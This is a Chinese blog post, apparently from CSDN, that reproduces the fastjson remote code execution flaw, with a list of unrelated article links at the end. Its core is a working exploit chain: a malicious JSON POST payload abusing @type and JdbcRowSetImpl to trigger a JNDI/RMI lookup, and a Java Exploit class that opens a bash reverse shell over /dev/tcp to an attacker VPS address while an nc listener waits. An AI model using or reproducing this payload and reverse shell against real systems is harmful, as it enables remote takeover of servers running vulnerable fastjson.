-
fastjson远程命令执行
fastjson远程代码执行
漏洞原因:fastjson在对json字符串反序列化的时候,会读取到@type的内容,将json内容反序列化为java对象并调用这个类的setter方法。
1、搭建rmi服务
直接利用jndi-exploit工具
2、抓包改为POST。开启nc监听、发包
POST的json数据:
Content-Type: application/json Content-Length: 你的数据长度 { "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"开的RMI服务", "autoCommit":true } }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
这里响应400不用管(环境原因)。vps上看到反弹shell是收到了的
收到shell
使用恶意文件反弹shell过程
// javac Exploit.java import java.lang.Runtime; import java.lang.Process; public class Exploit { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.200.131/7777 0>&1"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } } }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
具体过程和log4j2一样。
可以看看上一篇文章
log4j2漏洞复现 -
相关阅读:
【Linux从入门到放弃】Linux基本指令大全
【系统分析师之路】2023上综合知识历年真题
logback/log4j基本配置和标签详解
Matlab随机波动率SV、GARCH用MCMC马尔可夫链蒙特卡罗方法分析汇率时间序列
springboot个性化课程推荐系统毕业设计源码131805
武汉新时标文化传媒有限公司模仿创作在短视频内容生产中的价值
一起Talk Android吧(第四百一十六回:绘制正弦波总结)
linux基本指令总结--文件和目录
Verilog的系统任务----$fopen、$fclose和$fdisplay, $fwrite,$fstrobe,$fmonitor
10个常见的前端手写功能,你全都会吗?
- 原文地址:https://blog.csdn.net/m0_52920608/article/details/132925630
